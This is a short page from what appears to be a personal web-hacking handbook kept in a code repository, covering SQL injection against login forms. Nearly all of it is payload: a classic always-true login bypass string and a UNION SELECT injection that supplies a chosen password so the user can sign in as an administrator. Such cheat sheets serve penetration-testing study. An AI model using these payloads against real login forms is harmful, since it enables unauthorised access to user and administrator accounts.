x/handbook
1
0
Fork 0
Code Issues Pull requests Actions Packages Projects Releases Wiki Activity
handbook/tools/3.Web-Hacking/4.Injection/SQL/Commands/SQL-Injection-Vectors/2 - Login form.md

15 lines
234 B
Markdown
Raw Permalink Normal View History

vault backup: 2024-08-31 01:07:21
2024-08-30 23:07:22 +00:00
## Login Form
Login Bypass
```
'1 or 1=1;--
```
Impersonalisation
```
'UNION SELECT '123' AS password FROM admins WHERE '1' = '1 ---> Set Password has 123
```
- Enable you to login has Admin with the password "123"
Reference in a new issue Copy permalink